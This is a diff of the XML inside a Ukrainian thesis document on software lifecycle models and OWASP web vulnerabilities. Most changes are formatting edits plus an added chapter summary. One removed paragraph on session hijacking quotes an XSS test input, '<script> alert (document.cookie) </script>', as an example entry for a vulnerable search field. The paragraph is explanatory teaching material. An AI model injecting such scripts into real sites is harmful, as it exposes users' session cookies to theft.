+        <w:t>Міжсайтовий скриптинг (cross-site scripting, XSS) - це ще один різновид атаки на Web-додатки, що зберігає популярність вже багато років. Якщо Web-додаток містить XSS-уразливість, то зловмисник може впровадити на Web-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>сторінку шкідливий сценарій, що виконується при завантаженні сторінки користувачем.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -26243,7 +26244,6 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Вразливість</w:t>
       </w:r>
       <w:r>
@@ -26392,6 +26392,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Виведені додатком повідомлення про помилки, дозволяють зловмисникам краще зрозуміти структуру бази даних і підказують, в якому напрямку краще діяти, які команди і сценарії краще намагатися впроваджувати.</w:t>
       </w:r>
     </w:p>
@@ -26443,7 +26444,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -26479,7 +26480,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
         <w:tab/>
       </w:r>
@@ -26542,7 +26543,6 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Користувачі, що працюють з </w:t>
       </w:r>
       <w:r>
@@ -26819,7 +26819,19 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>Для захисту від підробки міжсайтових запитів розробники можуть скористатися різними прийомами, включаючи обов'язкове використання в кожному запиті випадкового маркера для перевірки достовірності сеансу або використання випадкових імен п</w:t>
+        <w:t xml:space="preserve">Для захисту від підробки міжсайтових запитів розробники можуть скористатися різними прийомами, включаючи обов'язкове використання в кожному запиті випадкового маркера для перевірки достовірності сеансу або </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>використання випадкових імен п</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -27059,7 +27071,6 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Web-додатки часто перенаправляють користувачів на інші сторінки за допомогою певних параметрів. Якщо ці параметри не перевіряються, то зловмисник може обманним шляхом перенаправити користувача на шкідливу Web-сторінку, змусивши його розкрити свій пароль та інші важливі дані. Наприклад, зловмисник може створити повідомлення електронної пошти з фішинговою посиланням, що містить ім'я необхідного Web-сайту. При цьому відповідальний за перенаправлення параметр, що міститься в кінці URL-адреси, може бути не видно користувачеві, в результаті чого користувач з великою ймовірністю клацне за цим посиланням або скопіює її в Web-браузер, так як доменне ім'я в URL-адресі не викличе у нього ніяких підозр.</w:t>
       </w:r>
     </w:p>
@@ -27074,7 +27085,7 @@
           <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -27086,7 +27097,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -27101,6 +27112,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -27110,12 +27122,10 @@
           <w:color w:val="2A2A2A"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="uk-UA"/>
         </w:rPr>
         <w:br/>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -27126,6 +27136,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -27156,9 +27167,11 @@
           <w:color w:val="212121"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -27827,6 +27840,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>1.3</w:t>
             </w:r>
           </w:p>
@@ -32018,7 +32032,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{DA435F37-0A70-466C-9F87-7FD5CF1D54D1}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{DDB9DE63-2032-4B82-A158-98234D0F2C95}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

</xml_diff>

<commit_message>
+ recap to ch 1,2
</commit_message>
<xml_diff>
--- a/Bullshit.docx
+++ b/Bullshit.docx
@@ -375,7 +375,7 @@
             <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
             <o:lock v:ext="edit" aspectratio="t"/>
           </v:shapetype>
-          <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:468.3pt;height:379pt">
+          <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:468pt;height:378.75pt">
             <v:imagedata r:id="rId7" o:title="Waterfall"/>
           </v:shape>
         </w:pict>
@@ -554,7 +554,7 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:pict>
-          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:468.3pt;height:379pt">
+          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:468pt;height:378.75pt">
             <v:imagedata r:id="rId8" o:title="Waterfall main"/>
           </v:shape>
         </w:pict>
@@ -3182,7 +3182,7 @@
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
         <w:pict>
-          <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:437.75pt;height:270.15pt">
+          <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:438pt;height:270pt">
             <v:imagedata r:id="rId9" o:title="V-model"/>
           </v:shape>
         </w:pict>
@@ -6568,24 +6568,28 @@
         <w:pStyle w:val="a3"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:noProof/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="4502638" cy="3101630"/>
-            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
-            <wp:docPr id="7" name="Рисунок 7" descr="Похожее изображение"/>
+            <wp:extent cx="4953000" cy="3105150"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="12" name="Рисунок 12"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -6593,7 +6597,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 3" descr="Похожее изображение"/>
+                    <pic:cNvPr id="0" name="Picture 6"/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
@@ -6614,7 +6618,7 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4502638" cy="3101630"/>
+                      <a:ext cx="4953000" cy="3105150"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -24403,6 +24407,195 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Висновки до розділу 1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">У даному розділі було розглянуто каскадну та </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>V</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">подібну моделі життєвого циклу програмного додатку з їх перевагами та недоліками. Також описано основні вимоги щодо якості розроблюваних додатків відповідно до стандартів </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ISO</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 9126 та </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>OWASP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ASVS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 3.0.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -24918,7 +25111,28 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">ідносяться до змішаних типів і виконують функції з аналізу широкого спектра програмних продуктів - веб-додатків, вбудованого коду і звичайного програмного забезпечення. Проте в даному огляді упор зроблений на застосування аналізаторів замовниками розробки, тому більша увага приділяється аналізатора веб-додатків і вбудованого коду. Аналізатори можуть містити </w:t>
+        <w:t xml:space="preserve">ідносяться до змішаних типів і виконують функції з аналізу широкого спектра програмних продуктів - веб-додатків, вбудованого коду і звичайного програмного забезпечення. Проте в даному огляді </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">акцент </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">зроблений на застосування аналізаторів замовниками розробки, тому більша увага приділяється аналізатора веб-додатків і вбудованого коду. Аналізатори можуть містити </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -26082,6 +26296,7 @@
         <w:pStyle w:val="a3"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="360" w:firstLine="346"/>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="2A2A2A"/>
@@ -26102,7 +26317,7 @@
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="5939790" cy="2084705"/>
+            <wp:extent cx="5939942" cy="2084758"/>
             <wp:effectExtent l="0" t="0" r="3810" b="0"/>
             <wp:docPr id="9" name="Рисунок 9"/>
             <wp:cNvGraphicFramePr>
@@ -26220,20 +26435,7 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve"> П</w:t>
-      </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ри проведенні оцінки вихідних текстів аналізатори використовують різні бази даних, що містять опис вразливостей і помилок програмування: Власна база вразливостей і помилок програмування - у кожного розробника аналізаторів вихідних кодів є свої відділи аналітики і досліджень, які готують спеціалізовані бази для аналізу вихідних текстів програм. </w:t>
+        <w:t xml:space="preserve"> При проведенні оцінки вихідних текстів аналізатори використовують різні бази даних, що містять опис вразливостей і помилок програмування: Власна база вразливостей і помилок програмування - у кожного розробника аналізаторів вихідних кодів є свої відділи аналітики і досліджень, які готують спеціалізовані бази для аналізу вихідних текстів програм. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -27340,44 +27542,6 @@
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>2. Некоректна аутентифікація і управління сеансами</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:outlineLvl w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Друга найбільш небезпечна уразливість в списку OWASP пов'язана з методами аутентифікації і захисту користувальницьких сеансів в Web-додатку. Існує безліч типів цієї уразливості, одним з яких є несанкціоноване використання сеансу.</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -27403,7 +27567,8 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>Несанкціоноване використання сеансу</w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t>2. Некоректна аутентифікація і управління сеансами</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27429,263 +27594,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>Зловмисник може спробувати вкрасти (несанкціоновано використовувати) Web-сеанс користувача, дізнавшись його секретний ідентифікатор. Знаючи секретний ідентифікатор сеансу, атакуючий може представитися Web-серверу аутентиф</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>ікованим</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> користувачем і скомпрометувати його обліковий запис. Якщо додаток недостатньо добре захищає ідентифікатори сеансів (наприклад, відображає ідентифікатори всередині URL-адреси замість використання cookie-файлів), то зловмиснику дуже просто отримати ідентифікатор сеансу, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>обдуривши</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> користувача.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:outlineLvl w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>Навіть якщо Web-додаток зберігає ідентифікатори сеансів в cookie-файлах, зловмисник все одно може отримати потрібну інформацію з локальних файлів користувача, хитрістю змусивши його виконати замаскований сценарій. За допомогою простого сценарію можна витягти ідентифікатор сеансу, що зберігається в cookie-файлі на комп'ютері користувача; наприклад, можна отримати ідентифікатор сеансу за допомогою наступного сценарію, введеного в поле пошуку уразливого Web-додатки: &lt;script&gt; alert (document.cookie) &lt;/ script&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>.</w:t>
